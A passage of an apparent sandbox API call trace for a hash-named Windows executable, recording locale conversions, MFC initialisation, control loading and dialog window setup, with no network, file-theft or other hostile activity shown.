¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㎌CĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0073.766] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㎌CĀ", cchSrc=256, lpDestStr=0x19f520, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㎌CĀ") returned 256 [0073.767] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x220, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㎌CĀ", cchWideChar=256, lpMultiByteStr=0x19fca0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x01", lpUsedDefaultChar=0x0) returned 256 [0073.770] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0073.770] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f700, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㎌CĀ") returned 256 [0073.770] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㎌CĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0073.770] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㎌CĀ", cchSrc=256, lpDestStr=0x19f500, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㎌CĀ") returned 256 [0073.771] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x220, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㎌CĀ", cchWideChar=256, lpMultiByteStr=0x19fba0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x01", lpUsedDefaultChar=0x0) returned 256 [0073.771] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x432f9c, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe")) returned 0x62 [0073.773] HeapFree (in: hHeap=0x2250000, dwFlags=0x0, lpMem=0x2254d48 | out: hHeap=0x2250000) returned 1 [0073.773] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x74650000 [0073.773] GetProcAddress (hModule=0x74650000, lpProcName="IsProcessorFeaturePresent") returned 0x74669bf0 [0073.773] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0073.773] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40b644) returned 0x0 [0073.776] GlobalLock (hMem=0x20b0004) returned 0x7123c0 [0073.776] LocalAlloc (uFlags=0x40, uBytes=0x118) returned 0x712248 [0073.776] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x71bc80 [0073.776] LocalAlloc (uFlags=0x0, uBytes=0x8) returned 0x7124d0 [0073.777] GetVersion () returned 0x23f00206 [0073.777] LocalAlloc (uFlags=0x40, uBytes=0x1074) returned 0x71cd30 [0073.777] GetACP () returned 0x4e4 [0073.778] GetCursorPos (in: lpPoint=0x430e04 | out: lpPoint=0x430e04*(x=1175, y=404)) returned 1 [0073.778] LocalAlloc (uFlags=0x40, uBytes=0x3c) returned 0x712e48 [0073.778] LocalReAlloc (hMem=0x7124d0, uBytes=0xc, uFlags=0x2) returned 0x706ce8 [0073.779] GetCurrentThread () returned 0xfffffffe [0073.779] GetCurrentThreadId () returned 0x6a0 [0073.779] RegisterClipboardFormatA (lpszFormat="commctrl_DragListMsg") returned 0xc1db [0073.780] GetVersion () returned 0x23f00206 [0073.780] GetProcessVersion (ProcessId=0x0) returned 0x40000 [0073.781] GetSystemMetrics (nIndex=11) returned 32 [0074.469] GetSystemMetrics (nIndex=12) returned 32 [0074.469] GetSystemMetrics (nIndex=2) returned 17 [0074.469] GetSystemMetrics (nIndex=3) returned 17 [0074.470] GetDC (hWnd=0x0) returned 0xa0100d0 [0074.470] GetDeviceCaps (hdc=0xa0100d0, index=88) returned 96 [0074.470] GetDeviceCaps (hdc=0xa0100d0, index=90) returned 96 [0074.470] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0074.475] GetSysColor (nIndex=15) returned 0xf0f0f0 [0074.475] GetSysColor (nIndex=16) returned 0xa0a0a0 [0074.475] GetSysColor (nIndex=20) returned 0xffffff [0074.475] GetSysColor (nIndex=18) returned 0x0 [0074.475] GetSysColor (nIndex=6) returned 0x646464 [0074.476] GetSysColorBrush (nIndex=15) returned 0x1100074 [0074.476] GetSysColorBrush (nIndex=6) returned 0x110007c [0074.476] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0074.476] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0074.476] GetOEMCP () returned 0x1b5 [0074.476] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x19fed0 | out: lpCPInfo=0x19fed0) returned 1 [0074.476] GetVersion () returned 0x23f00206 [0074.476] GetVersion () returned 0x23f00206 [0074.476] GetVersion () returned 0x23f00206 [0074.476] GetStartupInfoA (in: lpStartupInfo=0x19ff24 | out: lpStartupInfo=0x19ff24*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0074.476] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0074.477] SetErrorMode (uMode=0x0) returned 0x0 [0074.477] SetErrorMode (uMode=0x8001) returned 0x0 [0074.477] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x19fcac, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe")) returned 0x62 [0074.477] lstrcpynA (in: lpString1=0x19fdb0, lpString2="c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5", iMaxLength=260 | out: lpString1="c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5") returned="c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5" [0074.477] LoadStringA (in: hInstance=0x400000, uID=0xe000, lpBuffer=0x19fbac, cchBufferMax=256 | out: lpBuffer="") returned 0x0 [0074.477] lstrcpyA (in: lpString1=0x19fd0a, lpString2=".HLP" | out: lpString1=".HLP") returned=".HLP" [0074.477] lstrcatA (in: lpString1="c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5", lpString2=".INI" | out: lpString1="c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.INI") returned="c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.INI" [0074.478] GetCurrentThreadId () returned 0x6a0 [0074.478] SetWindowsHookExA (idHook=-1, lpfn=0x41a9c3, hmod=0x0, dwThreadId=0x6a0) returned 0x80239 [0074.478] LocalAlloc (uFlags=0x40, uBytes=0x30) returned 0x713970 [0074.478] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x7124d0 [0074.478] LocalReAlloc (hMem=0x706ce8, uBytes=0x10, uFlags=0x2) returned 0x706ce8 [0074.478] LoadIconA (hInstance=0x400000, lpIconName=0x80) returned 0x801d7 [0074.481] FindResourceA (hModule=0x400000, lpName=0x66, lpType=0x5) returned 0x435528 [0074.481] LoadResource (hModule=0x400000, hResInfo=0x435528) returned 0x446ee8 [0074.481] LockResource (hResData=0x446ee8) returned 0x446ee8 [0074.482] GetCurrentThreadId () returned 0x6a0 [0074.482] SetWindowsHookExA (idHook=5, lpfn=0x415d8a, hmod=0x0, dwThreadId=0x6a0) returned 0xe0201 [0074.482] GetModuleHandleA (lpModuleName="COMCTL32.DLL") returned 0x6cb80000 [0074.482] LoadLibraryA (lpLibFileName="COMCTL32.DLL") returned 0x6cb80000 [0074.483] GetProcAddress (hModule=0x6cb80000, lpProcName="InitCommonControlsEx") returned 0x6cb85000 [0074.483] InitCommonControlsEx (picce=0x19fd40) returned 1 [0074.485] FreeLibrary (hLibModule=0x6cb80000) returned 1 [0074.485] GetModuleHandleA (lpModuleName="COMCTL32.DLL") returned 0x6cb80000 [0074.485] LoadLibraryA (lpLibFileName="COMCTL32.DLL") returned 0x6cb80000 [0074.486] GetProcAddress (hModule=0x6cb80000, lpProcName="InitCommonControlsEx") returned 0x6cb85000 [0074.486] InitCommonControlsEx (picce=0x19fd40) returned 1 [0074.486] FreeLibrary (hLibModule=0x6cb80000) returned 1 [0074.486] GetModuleHandleA (lpModuleName="COMCTL32.DLL") returned 0x6cb80000 [0074.486] LoadLibraryA (lpLibFileName="COMCTL32.DLL") returned 0x6cb80000 [0074.486] GetProcAddress (hModule=0x6cb80000, lpProcName="InitCommonControlsEx") returned 0x6cb85000 [0074.486] InitCommonControlsEx (picce=0x19fd40) returned 1 [0074.486] FreeLibrary (hLibModule=0x6cb80000) returned 1 [0074.486] GetModuleHandleA (lpModuleName="COMCTL32.DLL") returned 0x6cb80000 [0074.487] LoadLibraryA (lpLibFileName="COMCTL32.DLL") returned 0x6cb80000 [0074.487] GetProcAddress (hModule=0x6cb80000, lpProcName="InitCommonControlsEx") returned 0x6cb85000 [0074.487] InitCommonControlsEx (picce=0x19fd40) returned 1 [0074.487] FreeLibrary (hLibModule=0x6cb80000) returned 1 [0074.487] GetModuleHandleA (lpModuleName="COMCTL32.DLL") returned 0x6cb80000 [0074.487] LoadLibraryA (lpLibFileName="COMCTL32.DLL") returned 0x6cb80000 [0074.487] GetProcAddress (hModule=0x6cb80000, lpProcName="InitCommonControlsEx") returned 0x6cb85000 [0074.487] InitCommonControlsEx (picce=0x19fd40) returned 1 [0074.488] FreeLibrary (hLibModule=0x6cb80000) returned 1 [0074.488] RtlAllocateHeap (HeapHandle=0x2250000, Flags=0x0, Size=0x1410) returned 0x2254d48 [0074.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MS Sans Serif", cchWideChar=-1, lpMultiByteStr=0x2254d58, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS Sans Serif", lpUsedDefaultChar=0x0) returned 14 [0074.488] lstrlenA (lpString="MS Sans Serif") returned 13 [0074.488] GetSystemMetrics (nIndex=42) returned 0 [0074.488] CreateDialogIndirectParamA (hInstance=0x400000, lpTemplate=0x446ee8, hWndParent=0x0, lpDialogFunc=0x41ac36, dwInitParam=0x0) [0075.207] GetParent (hWnd=0x20386) returned 0x0 [0075.207] SetWindowLongA (hWnd=0x20386, nIndex=-4, dwNewLong=4283258) returned 2006429584 [0075.207] CallNextHookEx (hhk=0xe0201, nCode=3, wParam=0x20386, lParam=0x19f850) returned 0x0 [0075.209] CallWindowProcA (lpPrevWndFunc=0x7797af90, hWnd=0x20386, Msg=0x81, wParam=0x0, lParam=0x19f8a0) returned 0x1 [0075.211] GetWindowLongA (hWnd=0x4022a, nIndex=-4) returned 1954290720 [0075.211] GetPropA (hWnd=0x4022a, lpString="AfxOldWndProc423") returned 0x0 [0075.211] SetPropA (hWnd=0x4022a, lpString="AfxOldWndProc423", hData=0x747c1c20) returned 1 [0075.211] GetPropA (hWnd=0x4022a, lpString="AfxOldWndProc423") returned 0x747c1c20 [0075.212] GlobalAddAtomA (lpString="AfxOldWndProc423") returned 0xc096 [0075.212] SetWindowLongA (hWnd=0x4022a, nIndex=-4, dwNewLong=4283311) returned 2006429744 [0075.212] CallNextHookEx (hhk=0xe0201, nCode=3, wParam=0x4022a, lParam=0x19f850) returned 0x0 [0075.212] GetPropA (hWnd=0x4022a, lpString="AfxOldWndProc423") returned 0x747c1c20 [0075.212] CallWindowProcA (lpPrevWndFunc=0x747c1c20, hWnd=0x4022a, Msg=0x81, wParam=0x0, lParam=0x19f8a0) returned 0x1 [0075.213] GetPropA (hWnd=0x4022a, lpString="AfxOldWndProc423") returned 0x747c1c20 [0075.214] CallWindowProcA (lpPrevWndFunc=0x747c1c20, hWnd=0x4022a, Msg=0x83, wParam=0x0, lParam=0x19f88c) returned 0x0 [0075.214] GetPropA (hWnd=0x4022a, lpString="AfxOldWndProc423") returned 0x747c1c20 [0075.214] CallWindowProcA (lpPrevWndFunc=0x747c1c20, hWnd=0x4022a, Msg=0x1, wParam=0x0, lParam=0x19f8a0) returned 0x0 [0075.215] GetPropA (hWnd=0x4022a, lpString="AfxOldWndProc423") returned 0x747c1c20 [0075.215] CallWindowProcA (lpPrevWndFunc=0x747c1c20, hWnd=0x4022a, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0075.215] GetPropA (hWnd=0x4022a, lpString="AfxOldWndProc423") returned 0x747c1c20 [0075.215] CallWindowProcA (lpPrevWndFunc=0x747c1c20, hWnd=0x4022a, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0075.215] GetPropA (hWnd=0x4022a, lpString="AfxOldWndProc423") returned 0x747c1c20 [0075.216] CallWindowProcA (lpPrevWndFunc=0x747c1c20, hWnd=0x4022a, Msg=0x287, wParam=0x21, lParam=0x0) returned 0x0 [0075.218] CallWindowProcA (lpPrevWndFunc=0x7797af90, hWnd=0x20386, Msg=0x83, wParam=0x0, lParam=0x19f88c) returned 0x0 [0075.587] CallWindowProcA (lpPrevWndFunc=0x7797af90, hWnd=0x20386, Msg=0x1, wParam=0x0, lParam=0x19f8a0) returned 0x0 [0075.588] CallWindowProcA (lpPrevWndFunc=0x7797af90, hWnd=0x20386, Msg=0x5, wParam=0x0, lParam=0x480116) returned 0x0 [0075.588] CallWindowProcA (lpPrevWndFunc=0x7797af90, hWnd=0x20386, Msg=0x3, wParam=0x0, lParam=0x1a0003) returned 0x0 [0075.605] CallWindowProcA (lpPrevWndFunc=0x7797af90, hWnd=0x20386, Msg=0x30, wParam=0x760a0955, lParam=0x0) returned 0x0 [0075.607] CallNextHookEx (hhk=0xe0201, nCode=3, wParam=0x1402e0, lParam=0x19f850) returned 0x0 [0075.609] CallNextHookEx (hhk=0xe0201, nCode=3, wParam=0x2038a, lParam=0x19f850) returned 0x0 [0075.611] CallNextHookEx (hhk=0xe0201, nCode=3, wParam=0xf01d4, lParam=0x19f850) returned 0x0 [0075.614] GetWindowRect (in: hWnd=0x20386, lpRect=0x19fa70 | out: lpRect=0x19fa70) returned 1 [0075.614] GetWindowLongA (hWnd=0x20386, nIndex=-16) returned -2067267388 [0075.614] CallWindowProcA (lpPrevWndFunc=0x7797af90, hWnd=0x20386, Msg=0x110, wParam=0x1402e0, lParam=0x0) [0075.615] FindResourceA (hModule=0x400000, lpName=0x66, lpType=0xf0) returned 0x0 [0075.615] GetTopWindow (hWnd=0x20386) returned 0x1402e0 [0075.615] SendMessageA (hWnd=0x1402e0, Msg=0x364, wParam=0x0, lParam=0x0) returned 0x0 [0075.615] GetWindow (hWnd=0x1402e0, uCmd=0x2) returned 0x2038a [0075.615] SendMessageA (hWnd=0x2038a, Msg=0x364, wParam=0x0, lParam=0x0) returned 0x0 [0075.615] GetWindow (hWnd=0x2038a, uCmd=0x2) returned 0xf01d4 